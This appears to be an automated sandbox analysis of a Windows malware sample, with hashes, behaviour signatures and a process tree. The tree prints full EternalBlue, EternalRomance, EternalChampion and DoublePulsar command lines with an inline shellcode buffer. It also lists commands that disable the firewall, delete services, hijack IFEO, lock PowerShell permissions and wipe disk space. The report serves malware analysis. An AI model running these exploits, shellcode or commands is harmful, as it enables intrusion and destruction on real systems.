Analysis
max time kernel: 133s
max time network: 75s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64 arch:x86 image:win7-20240221-en locale:en-us os:windows7-x64 system
submitted: 01-06-2024 05:58

Static task: static1
Behavioral task: behavioral1
    Sample: 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe
    Resource: win7-20240221-en
Behavioral task: behavioral2
    Sample: 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe
    Resource: win10v2004-20240508-en

General
Target: 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe
Size: 4.4MB
MD5: 898bbf64f5e0297bdd76cbd9ae5e4b81
SHA1: b978307d7df2d778201fbb6bdf8076ce51b913c2
SHA256: 09a7c474a03954083379dbbe1aed0f2120776688c294ebedb71e3362113e9db2
SHA512: 8a5b8f2d34231dcf056ab7b2216efedaddc6890efd5167cc8ee7611a8036f0c923b41230c5ab7887645ca018c37a8afc6ac4efb32f5abd28f8b928dbf1da6fd3
SSDEEP: 98304:Hv3onZ+azh+78Wftj4puoeuaKhlrH9L7TRZ+ZHJtj/IcikcskwvOC+:wZTzh+wWftLoeghlpzX+ZHTgZwvk
Malware Config
Signatures
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.

Blocklisted process makes network request 2 IoCs
flow  pid   Process
1103  4976  cscript.exe
7700  1272  cscript.exe

Drops file in Drivers directory 1 IoCs
description                   ioc                                    Process
File opened for modification  C:\Windows\system32\drivers\etc\hosts  cmd.exe

Modifies Windows Firewall 2 TTPs 1 IoCs
pid  Process
992  netsh.exe
Sets file execution options in registry 2 TTPs 2 IoCs
Registers taskkill.exe as the Image File Execution Options "debugger" for CrowdtestWatcher.exe. Windows then starts the registered debugger (with the original command line appended) instead of the program itself whenever CrowdtestWatcher.exe is launched, so that program never runs; pointing the IFEO debugger at a harmless binary is a common way to neuter a monitoring or security tool.
description      ioc                                                                                                                                           Process
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CrowdtestWatcher.exe                              reg.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CrowdtestWatcher.exe\debugger = "taskkill.exe"    reg.exe
Sets file to hidden 1 TTPs 17 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process (all attrib.exe): 4900, 4536, 5720, 5372, 5928, 3532, 2932, 5680, 3820, 4988, 5104, 3500, 5360, 5304, 5884, 5384, 4048

Deletes itself 1 IoCs
pid   Process
2804  WScript.exe

Executes dropped EXE 8 IoCs
pid   Process
812   conhost.exe
2468  Fileftp.exe
5372  conhost.exe
4588  Eternalblue-2.2.0.exe
3604  Eternalromance-1.4.0.exe
2396  Eternalchampion-2.0.0.exe
6072  Doublepulsar-1.3.1.exe
4872  Doublepulsar-1.3.1.exe

Loads dropped DLL 64 IoCs
pid   Process                    load events
2376  cmd.exe                    1
812   conhost.exe                1
2468  Fileftp.exe                6
4588  Eternalblue-2.2.0.exe      9
3604  Eternalromance-1.4.0.exe   9
2396  Eternalchampion-2.0.0.exe  9
4872  Doublepulsar-1.3.1.exe     15
6072  Doublepulsar-1.3.1.exe     14

Modifies file permissions 1 TTPs 17 IoCs
pid Process (all takeown.exe): 5296, 3880, 3516, 4464, 5424, 5764, 1724, 2916, 4232, 6036, 5968, 2440, 5732, 3916, 5768, 3076, 5520

resource                                                                      yara_rule
behavioral1/files/0x0007000000014246-21.dat                                   upx
behavioral1/memory/2468-26-0x0000000000400000-0x0000000000CB0000-memory.dmp   upx
behavioral1/memory/2468-121-0x0000000000400000-0x0000000000CB0000-memory.dmp  upx
behavioral1/memory/2468-134-0x0000000000400000-0x0000000000CB0000-memory.dmp  upx
behavioral1/memory/2468-136-0x0000000000400000-0x0000000000CB0000-memory.dmp  upx
behavioral1/memory/2468-138-0x0000000000400000-0x0000000000CB0000-memory.dmp  upx
behavioral1/memory/2468-140-0x0000000000400000-0x0000000000CB0000-memory.dmp  upx
behavioral1/memory/2468-142-0x0000000000400000-0x0000000000CB0000-memory.dmp  upx
behavioral1/memory/2468-144-0x0000000000400000-0x0000000000CB0000-memory.dmp  upx
behavioral1/memory/2468-146-0x0000000000400000-0x0000000000CB0000-memory.dmp  upx
behavioral1/memory/2468-221-0x0000000000400000-0x0000000000CB0000-memory.dmp  upx
behavioral1/memory/2468-223-0x0000000000400000-0x0000000000CB0000-memory.dmp  upx
behavioral1/memory/2468-227-0x0000000000400000-0x0000000000CB0000-memory.dmp  upx
behavioral1/memory/2468-230-0x0000000000400000-0x0000000000CB0000-memory.dmp  upx
behavioral1/memory/2468-232-0x0000000000400000-0x0000000000CB0000-memory.dmp  upx
behavioral1/memory/2468-234-0x0000000000400000-0x0000000000CB0000-memory.dmp  upx
behavioral1/memory/2468-289-0x0000000000400000-0x0000000000CB0000-memory.dmp  upx

Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description              ioc     Process
File opened (read-only)  \??\F:  Fileftp.exe

Drops file in System32 directory 2 IoCs
description                   ioc                                         Process
File opened for modification  C:\Windows\SysWOW64\HalPluginsServices.dll  attrib.exe
File opened for modification  C:\Windows\SysWOW64\wmassrv.dll             attrib.exe
Drops file in Program Files directory 64 IoCs
description                   ioc                                                   Process
File created                  C:\Program Files\Windowsd\Esteemaudittouch-2.1.0.exe  Fileftp.exe
File created                  C:\Program Files\Windowsd\Esteemaudittouch-2.1.0.fb   Fileftp.exe
File created                  C:\Program Files\Windowsd\iconv.dll                   Fileftp.exe
File created                  C:\Program Files\Windowsd\pcre-0.dll                  Fileftp.exe
File created                  C:\Program Files\Windowsd\Pkill.dll                   Fileftp.exe
File created                  C:\Program Files\Windowsd\trch-0.dll                  Fileftp.exe
File created                  C:\Program Files\Windowsd\trfo-0.dll                  Fileftp.exe
File created                  C:\Program Files\Windowsd\dmgd-1.dll                  Fileftp.exe
File created                  C:\Program Files\Windowsd\zlib1.dll                   Fileftp.exe
File created                  C:\Program Files\Windowsd\xdvl-0.dll                  Fileftp.exe
File created                  C:\Program Files\Windowsd\Esteemaudittouch-2.1.0.xml  Fileftp.exe
File created                  C:\Program Files\Windowsd\tucl-1.dll                  Fileftp.exe
File created                  C:\Program Files\Windowsd\tem.vbs                     Fileftp.exe
File created                  C:\Program Files\Windowsd\Eternalblue-2.2.0.fb        Fileftp.exe
File created                  C:\Program Files\Windowsd\Eternalchampion-2.0.0.xml   Fileftp.exe
File created                  C:\Program Files\Windowsd\Eternalromance-1.3.0.exe    Fileftp.exe
File created                  C:\Program Files\Windowsd\riar.dll                    Fileftp.exe
File created                  C:\Program Files\Windowsd\tibe-2.dll                  Fileftp.exe
File opened for modification  C:\Program Files\Windowsd\Fileftp.exe                 conhost.exe
File created                  C:\Program Files\Windowsd\exma.dll                    Fileftp.exe
File created                  C:\Program Files\Windowsd\riar-2.dll                  Fileftp.exe
File created                  C:\Program Files\Windowsd\cnli-1.dll                  Fileftp.exe
File created                  C:\Program Files\Windowsd\Esteemaudit-2.1.0.exe       Fileftp.exe
File created                  C:\Program Files\Windowsd\Esteemaudit-2.1.0.fb        Fileftp.exe
File created                  C:\Program Files\Windowsd\etchCore-1.x64.dll          Fileftp.exe
File created                  C:\Program Files\Windowsd\etebCore-2.x86.dll          Fileftp.exe
File created                  C:\Program Files\Windowsd\pcreposix-0.dll             Fileftp.exe
File created                  C:\Program Files\Windowsd\trch.dll                    Fileftp.exe
File opened for modification  C:\program files (x86)\exfg                           attrib.exe
File created                  C:\Program Files\Windowsd\Eternalromance-1.3.0.xml    Fileftp.exe
File created                  C:\Program Files\Windowsd\crli-0.dll                  Fileftp.exe
File created                  C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe      Fileftp.exe
File created                  C:\Program Files\Windowsd\zibe.dll                    Fileftp.exe
File created                  C:\Program Files\Windowsd\shellcode.bin               Fileftp.exe
File created                  C:\Program Files\Windowsd\ssleay32.dll                Fileftp.exe
File created                  C:\Program Files\Windowsd\ucl.dll                     Fileftp.exe
File created                  C:\Program Files\Windowsd\Fileftp.exe                 conhost.exe
File created                  C:\Program Files\Windowsd\1.txt                       Eternalromance-1.4.0.exe
File created                  C:\Program Files\Windowsd\x64.dll                     conhost.exe
File created                  C:\Program Files\Windowsd\Eternalblue-2.2.0.exe       Fileftp.exe
File opened for modification  C:\Program Files\Windowsd\log.txt                     Eternalchampion-2.0.0.exe
File created                  C:\Program Files\Windowsd\Eternalchampion-2.0.0.fb    Fileftp.exe
File created                  C:\Program Files\Windowsd\posh-0.dll                  Fileftp.exe
File created                  C:\Program Files\Windowsd\tibe.dll                    Fileftp.exe
File created                  C:\Program Files\Windowsd\adfw.dll                    Fileftp.exe
File created                  C:\Program Files\Windowsd\cnli-0.dll                  Fileftp.exe
File created                  C:\Program Files\Windowsd\dmgd-4.dll                  Fileftp.exe
File created                  C:\Program Files\Windowsd\etchCore-0.x86.dll          Fileftp.exe
File created                  C:\Program Files\Windowsd\etebCore-2.x64.dll          Fileftp.exe
File created                  C:\Program Files\Windowsd\Eternalblue-2.2.0.xml       Fileftp.exe
File opened for modification  C:\Program Files\Windowsd\1.txt                       Eternalchampion-2.0.0.exe
File opened for modification  C:\Program Files\Windowsd\tem.vbs                     Fileftp.exe
File created                  C:\Program Files\Windowsd\Eternalromance-1.4.0.fb     Fileftp.exe
File created                  C:\Program Files\Windowsd\Doublepulsar-1.3.1.xml      Fileftp.exe
File created                  C:\Program Files\Windowsd\libiconv-2.dll              Fileftp.exe
File created                  C:\Program Files\Windowsd\libxml2.dll                 Fileftp.exe
File created                  C:\Program Files\Windowsd\pcrecpp-0.dll               Fileftp.exe
File created                  C:\Program Files\Windowsd\tibe-1.dll                  Fileftp.exe
File opened for modification  C:\Program Files\Windowsd\Fileftp.exe                 conhost.exe
File opened for modification  C:\Program Files\Windowsd\log.txt                     Eternalblue-2.2.0.exe
File created                  C:\Program Files\Windowsd\Eternalromance-1.4.0.xml    Fileftp.exe
File created                  C:\Program Files\Windowsd\Eternalchampion-2.0.0.exe   Fileftp.exe
File created                  C:\Program Files\Windowsd\Eternalromance-1.3.0.fb     Fileftp.exe
File created                  C:\Program Files\Windowsd\etchCore-0.x64.dll          Fileftp.exe
Drops file in Windows directory 13 IoCs
description                   ioc                              Process
File opened for modification  C:\Windows\splwow64.exe          attrib.exe
File opened for modification  C:\Windows\Fonts\Mysql           attrib.exe
File opened for modification  C:\Windows\SecureBootThemes      attrib.exe
File opened for modification  C:\Windows\sysprepthemes         attrib.exe
File opened for modification  C:\Windows\svchost.exe           attrib.exe
File opened for modification  C:\Windows\debug\lsmos.exe       attrib.exe
File opened for modification  C:\Windows\boy.exe               attrib.exe
File opened for modification  C:\Windows\SpeechsTracing        attrib.exe
File created                  \??\c:\windows\inf\demo1.bat     898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe
File created                  \??\c:\windows\inf\temp1.bat     898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe
File created                  C:\windows\Installer\conhost.exe 898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe
File created                  C:\windows\Installer\free.bat    898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe
File opened for modification  C:\Windows\system\lsaus.exe      attrib.exe
Launches sc.exe 64 IoCs
Sc.exe is a Windows utility to control services on the system.
pid Process (all sc.exe): 3808, 1044, 4644, 5356, 5804, 2340, 1796, 4660, 3872, 3504, 4956, 5708, 5152, 3384, 5116, 3852, 3048, 2684, 5480, 3388, 1128, 2964, 5152, 3580, 5904, 4932, 5132, 4836, 4852, 3428, 3440, 6096, 4892, 5376, 2212, 6116, 5340, 1384, 2572, 4724, 5472, 1424, 4584, 4916, 5372, 4720, 3432, 4668, 4832, 4232, 1540, 4860, 5488, 4924, 3456, 3464, 4632, 4700, 4660, 4944, 3820, 5624, 5136, 3420
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid   Process
4732  schtasks.exe
5444  schtasks.exe

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid   Process
5316  ipconfig.exe

Kills process with WMI 22 IoCs
pid Process (all WMIC.exe): 1896, 3992, 3516, 3976, 4828, 5952, 5068, 5184, 5508, 3580, 5252, 3548, 3484, 5556, 4948, 4624, 5856, 5176, 4032, 2088, 5404, 5044

Kills process with taskkill 15 IoCs
pid Process (all taskkill.exe): 5268, 5856, 3548, 5920, 4516, 4508, 4028, 3360, 3444, 1704, 2348, 6080, 4584, 5244, 5192
Modifies Internet Explorer settings
description  ioc                                                                                                           Process
Key deleted  \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TypedURLs  Fileftp.exe
Runs net.exe

Runs ping.exe 1 TTPs 2 IoCs
pid   Process
1724  PING.EXE
2300  PING.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs
pid   Process
2468  Fileftp.exe
2468  Fileftp.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs
pid   Process       Token(s)
2440  takeown.exe   SeTakeOwnershipPrivilege
2348  taskkill.exe  SeDebugPrivilege
2916  takeown.exe   SeTakeOwnershipPrivilege
4232  takeown.exe   SeTakeOwnershipPrivilege
5296  takeown.exe   SeTakeOwnershipPrivilege
5268  taskkill.exe  SeDebugPrivilege
5856  WMIC.exe      SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35 (this sequence of 20 is recorded twice)
5732  takeown.exe   SeTakeOwnershipPrivilege
2468  Fileftp.exe   SeBackupPrivilege, SeSecurityPrivilege, SeSecurityPrivilege, SeBackupPrivilege, SeSecurityPrivilege, SeBackupPrivilege, SeSecurityPrivilege
5764  takeown.exe   SeTakeOwnershipPrivilege
6080  taskkill.exe  SeDebugPrivilege
5856  taskkill.exe  SeDebugPrivilege
2088  WMIC.exe      SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege

Suspicious use of SetWindowsHookEx 4 IoCs
pid   Process
2100  898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe
2100  898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe
2468  Fileftp.exe
2468  Fileftp.exe

Suspicious use of WriteProcessMemory 64 IoCs
pid   wrote to memory of  Process                                             procid_target  entries
2100  2588                898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe  28             4
2100  2964                898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe  29             4
2100  3048                898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe  31             4
2100  2512                898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe  33             4
2100  2192                898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe  34             4
2100  2556                898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe  35             4
2100  2572                898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe  36             4
2100  2608                898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe  39             4
2100  2516                898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe  41             4
2100  2380                898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe  43             4
2100  2676                898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe  44             4
2100  2692                898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe  46             4
2588  2900                net.exe                                             48             4
2100  2788                898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe  49             4
2100  2952                898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe  51             4
2100  2684                898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe  52             4

Views/modifies file attributes 1 TTPs 24 IoCs
pid Process (all attrib.exe): 1928, 5680, 3820, 1492, 3500, 3532, 4536, 5360, 1892, 4900, 1404, 4048, 5104, 2932, 5388, 4988, 5720, 5384, 5372, 1920, 1700, 5928, 5304, 5884
Processes
[1] C:\Users\Admin\AppData\Local\Temp\898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe  (PID 2100)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe"
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\SysWOW64\net.exe  (PID 2588)
        cmdline: net stop lanmanserver /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\SysWOW64\net1.exe  (PID 2900)
            cmdline: C:\Windows\system32\net1 stop lanmanserver /y
    [2] C:\Windows\SysWOW64\sc.exe  (PID 2964)
        cmdline: sc config lanmanserver start= DISABLED 2>nul
        - Launches sc.exe
    [2] C:\Windows\SysWOW64\sc.exe  (PID 3048)
        cmdline: sc delete lanmanserver
        - Launches sc.exe
    [2] C:\Windows\SysWOW64\net.exe  (PID 2512)
        cmdline: net stop mssecsvc2.0
        [3] C:\Windows\SysWOW64\net1.exe  (PID 2656)
            cmdline: C:\Windows\system32\net1 stop mssecsvc2.0
    [2] C:\Windows\SysWOW64\sc.exe  (PID 2192)
        cmdline: sc delete mssecsvc2.0
    [2] C:\Windows\SysWOW64\net.exe  (PID 2556)
        cmdline: net stop mssecsvc2.1
        [3] C:\Windows\SysWOW64\net1.exe  (PID 2300)
            cmdline: C:\Windows\system32\net1 stop mssecsvc2.1
    [2] C:\Windows\SysWOW64\sc.exe  (PID 2572)
        cmdline: sc delete mssecsvc2.1
        - Launches sc.exe
    [2] C:\Windows\SysWOW64\net.exe  (PID 2608)
        cmdline: net stop COMSysCts
        [3] C:\Windows\SysWOW64\net1.exe  (PID 2732)
            cmdline: C:\Windows\system32\net1 stop COMSysCts
    [2] C:\Windows\SysWOW64\sc.exe  (PID 2516)
        cmdline: sc delete COMSysCts
    [2] C:\Windows\SysWOW64\net.exe  (PID 2380)
        cmdline: net stop WmiAppSrv
        [3] C:\Windows\SysWOW64\net1.exe  (PID 1580)
            cmdline: C:\Windows\system32\net1 stop WmiAppSrv
    [2] C:\Windows\SysWOW64\sc.exe  (PID 2676)
        cmdline: sc delete WmiAppSrv
    [2] C:\Windows\SysWOW64\net.exe  (PID 2692)
        cmdline: net stop Bcdefg
        [3] C:\Windows\SysWOW64\net1.exe  (PID 2728)
            cmdline: C:\Windows\system32\net1 stop Bcdefg
    [2] C:\Windows\SysWOW64\sc.exe  (PID 2788)
        cmdline: sc delete Bcdefg
    [2] C:\Windows\SysWOW64\net.exe  (PID 2952)
        cmdline: net stop WSSDPSRVS
        [3] C:\Windows\SysWOW64\net1.exe  (PID 108)
            cmdline: C:\Windows\system32\net1 stop WSSDPSRVS
    [2] C:\Windows\SysWOW64\sc.exe  (PID 2684)
        cmdline: sc delete SSDPSRVS
        - Launches sc.exe
    [2] C:\Windows\SysWOW64\cmd.exe  (PID 2376)
        cmdline: cmd /c C:\windows\Installer\conhost.exe
        - Loads dropped DLL
        [3] C:\windows\Installer\conhost.exe  (PID 812)
            cmdline: C:\windows\Installer\conhost.exe
            - Executes dropped EXE
            - Loads dropped DLL
            - Drops file in Program Files directory
            [4] C:\Program Files\Windowsd\Fileftp.exe  (PID 2468)
                cmdline: "C:\Program Files\Windowsd\Fileftp.exe"
                - Executes dropped EXE
                - Loads dropped DLL
                - Enumerates connected drives
                - Drops file in Program Files directory
                - Modifies Internet Explorer settings
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                - Suspicious use of SetWindowsHookEx
                [5] C:\Windows\SysWOW64\netsh.exe  (PID 992)
                    cmdline: netsh firewall set opmode mode=disable
                    - Modifies Windows Firewall
                [5] C:\Program Files\Windowsd\Eternalblue-2.2.0.exe  (PID 4588)
                    cmdline: "C:\Program Files\Windowsd\Eternalblue-2.2.0.exe" --TargetIp 10.127.0.243 --Target WIN72K8R2 --logfile log.txt
                    - Executes dropped EXE
                    - Loads dropped DLL
                    - Drops file in Program Files directory
                [5] C:\Program Files\Windowsd\Eternalromance-1.4.0.exe  (PID 3604)
                    cmdline: "C:\Program Files\Windowsd\Eternalromance-1.4.0.exe" --TargetIp 10.127.0.243 --Target XP_SP0SP1_X86 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --VerifyTarget True --ShellcodeFile shellcode.bin --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 1.txt --logfile log.txt
                    - Executes dropped EXE
                    - Loads dropped DLL
                    - Drops file in Program Files directory
                [5] Eternalchampion-2.0.0.exe (image path, full command line with inline shellcode buffer, and PID follow)
C:\Program Files\Windowsd\Eternalchampion-2.0.0.exe"C:\Program Files\Windowsd\Eternalchampion-2.0.0.exe" Eternalchampion-2.0.0.exe --TargetIp 10.127.0.243 --Target XP_SP0SP1_X86 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --VerifyTarget True --ShellcodeBuffer 31C040900F8490060000E800000000586089C389E583EC60648B0D38000000668B4106C1E010668B01662500F08B086681F94D5A74072D00100000EBF08945FC5389C3B9940169E3E8C60100008945F8B9855483F0E8B90100008945F4B92E5B51D2E8AC0100008945ECB9B45CA05BE89F0100008945A45BB91401000029CC890C2454FF55A48B4C24048B54240881C41401000031C080F9067C0680FA027C01408945B88D55E831C9890A526A00526A0BFF55EC8B55E885D20F8450010000526A00FF55F885C00F844201000089C789C66A00FF75E8576A0BFF55EC85C00F852B01000081EFFC00000031C08945B48945B081C71C01000089F8E8C7010000B9FA3CADC239C8742FB91ABD4B2B39C87426B98B2D3D7639C87425B96BDD461F39C8741C8B55E881EA1C0100000F8CDD0000008955E8EBBB8B4FEC894DB4EB068B4FEC894DB0E86502000085C074A456FF55F48B75B489F05050682E6461746A61E88802000085C00F84A20000005883E940E8BB02000085C074158B16C1EA1889F0C1E81839D075078B464885C0740A83C60483E904E378EBD88975F05668F80F00006A00FF55F885C074645089C731C089C16681C10004F3AB5889008B55FC89500431D78B55F889500831D78B55F489500C31D78B55F089501031D78978248B4DB885C97411E89E0100008B55AC8950548B55A889505883C06089C78DB365040000B926020000F3A489C75B897B3889EC61C3535251575589E583EC1889CF89D88945FCE87F00000085C0746E8945F8E8F30000008945F48B45FC8B4DF8E81601000085C074548945F08B45FC8B4DF8E80C01000085C074428945EC8B45FC8B4DF8E80201000085C074308945E88B45FC89F98B55EC8B5DF4E8B000000083F8FF742189C18B45E8E8E40000006689C28B45FC8B4DF0E8DE00000083C4185D5F595A5BC331C0EBF35689C683C63C8B3601C666813E5045750983C6788B3601F05EC331C0EBFA56515789C631C089C7C1E70729C789F831C98A0E80F900740501C846EBE95F595EC356575289C631C089C7C1E70729C789F831D28A1601D046E2EE5A5F5EC356515789C631C089C7C1E70729C789F831C98A0E80F90074C601C84646EBE85F595EC383C0188B00C357565131FF89C639DF74198B04BA01F0E883FFFFFF39C8740747EBEB595E5FC389F8EBF8B8FFFFFFFF
EBF183C11C8B0901C8C383C1208B0901C8C383C1248B0901C8C3D1E101C8668B00C381E2FFFF0000C1E20201D18B0901C8C350538B5DB0B9605AB582E87BFEFFFF8B500231C08A0284C075098955AC8945A84088025B58C331C08B4DB485C9740F8B4DB885C974078B4DB085C9740140C352568B74240C8B4C241031D2D1E985C9740CC1C205AC460C2030C249EBF089D05E5AC20800585A5F5E505689F083C63C8B3601C631C089C1668B4E06668B461401C683C61885C9741D8B0639F875078B460439D0740683C62849EBE98B460C8B4E085E01C6C331F6C36031C083F80F741E31C98B3C868B148E39D774034175F30FB694035604000039D1750D40EBDD4139C875056131C040C36131C0C3000102030405060708090A09090D0E8B4C240460E8000000005D6681E500F0894D34E8E5010000E84F010000E88B01000085C00F84E30000008B5D3C8B4BD8E8230100003C23740D3C77741C3CC87422E9B60000008B4D388B452489410E31C0884112E99F000000E81F010000E9B50000008B5D3C8B43E88B303375288B7808337D288B40043345283B431089C3757B8B4D3039F18B452C7418E8FE0000008D4604506A00FF550885C0746389452C89753001DF39F7775329DF01C75789F28B753C8B76F089D9F3A45E89D9C1E9028B5D28311E83C604E2F901D039C67C288B452C6089E650FFD089F461E8AD0000008B4524D1E831C988C101E98B0931C8894524E874000000B010EB08B020EB04B030EB008B4D38B4006601411E8B45108944241C61FF603C8B555485D274058B4D58880A8D45608B4D0C89885301000089A84A01000066B810008B4D386601411E8B45108944241C6168000000008B403C506800000000C331C088C8C1E90800C8C1E90800C8C1E90800C8C3518B452489C10FC9D1E031C889452859C360E80B0000008B45108B483C89483861C3608B5D2C85DB740D31C089DF8B4D30F3AA53FF550C31C089453089452C61C357525689CF8B55448B0AE83900000085C0750E83C2088B0AE82B00000085C07421894D446A0C588D71543B06740783C6043B06750D3B4604750889753C31C040EB0231C05E5A5FC331C039C17D0140C3525131D2668B510201CA3B11740583C104EBF75A8D411C83C00724F88945448B41F889453889D15AC35355575641544155415641574889E54881ECA80000006683E4F0E895040000488945F84889C3B92E5B51D2E8000300004885C00F84890200004889C6B9940169E3E8EA0200004885C00F8473020000488945F04889C7B9855483F0E8D00200004885C00F8459020000488945E8B9B45CA05BE8B90200004885C00F84420200004889458831C0488945A048894598B9140100004829CC890C244889E14883EC2CFF55884883
--VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 1.txt --logfile log.txt
      [5] PID:2396 | Executes dropped EXE; Loads dropped DLL; Drops file in Program Files directory
      [5] C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe | "C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe" --TargetIp 10.127.0.243 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload x64.dll | PID:6072 | Executes dropped EXE; Loads dropped DLL
      [5] C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe | "C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe" --TargetIp 10.127.0.243 --Protocol SMB --Architecture x86 --Function RunDLL --DllPayload x86.dll | PID:4872 | Executes dropped EXE; Loads dropped DLL
      [5] C:\Windows\SysWOW64\cmd.exe | cmd /c cipher /w:C | PID:5584
        [6] C:\Windows\SysWOW64\cipher.exe | cipher /w:C | PID:1420
      [5] C:\Windows\SysWOW64\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\Program Files\Windowsd\tem.vbs" | PID:4868
[2] C:\Windows\SysWOW64\cmd.exe | cmd /c c:\windows\inf\demo1.bat | PID:2404 | Drops file in Drivers directory
  [3] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /t /im powershell.exe | PID:2348 | Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /a | PID:2916 | Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:3580
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f | PID:3592
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:5228
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r | PID:5292
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:5896
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r | PID:5904
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:5932
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE | PID:5940
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo Y" | PID:5956
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service" | PID:5972
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:6012
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system | PID:6020
  [3] C:\Windows\SysWOW64\takeown.exe | takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a | PID:6036 | Modifies file permissions
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:6060
  [3] C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f | PID:6068
  [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo y" | PID:6104
